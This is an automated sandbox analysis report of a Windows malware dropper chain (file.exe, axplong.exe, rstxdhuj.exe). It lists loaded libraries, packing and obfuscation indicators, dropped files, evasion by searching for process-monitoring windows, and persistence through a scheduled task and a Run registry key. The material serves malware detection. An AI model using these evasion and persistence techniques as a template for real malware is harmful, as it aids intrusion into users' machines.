Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static file information: File size 1904128 > 1048576
Source: file.exe Static PE information: Raw size of ekhnjnoj is bigger than: 0x100000 < 0x19f400
Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbMg` source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbx source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @Ho.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
.NET source code contains potential unpacker
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Yara detected Costura Assembly Loader
Source: Yara match File source: 10.2.rstxdhuj.exe.5a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2025753148.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: Ylrdnrwcx.exe.10.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1de814 should be: 0x1d51c6
Source: rstxdhuj.exe.9.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: rstxdhuj[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: file.exe Static PE information: real checksum: 0x1de814 should be: 0x1d51c6
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: ekhnjnoj
Source: file.exe Static PE information: section name: kroqoubj
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: ekhnjnoj
Source: axplong.exe.0.dr Static PE information: section name: kroqoubj
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: 5[1].exe.9.dr Static PE information: section name: .xdata
Source: 5.exe.9.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021D84C push ecx; ret 9_2_0021D85F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_0597301E pushad ; retf 10_2_05973031
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05972EA7 push esp; retf 10_2_05972EA8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD6428 push eax; iretd 10_2_05AD6429
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADEC10 pushfd ; retf 10_2_05ADEC11
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA052E push cs; ret 10_2_05BA052F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E26500 push edi; iretd 10_2_05E26506
Source: file.exe Static PE information: section name: entropy: 7.979840266665317
Source: file.exe Static PE information: section name: ekhnjnoj entropy: 7.953325357730412
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979840266665317
Source: axplong.exe.0.dr Static PE information: section name: ekhnjnoj entropy: 7.953325357730412
Source: rstxdhuj.exe.9.dr Static PE information: section name: .text entropy: 7.989713684706289
Source: rstxdhuj[1].exe.9.dr Static PE information: section name: .text entropy: 7.989713684706289
Source: Ylrdnrwcx.exe.10.dr Static PE information: section name: .text entropy: 7.989713684706289
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000343001\5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
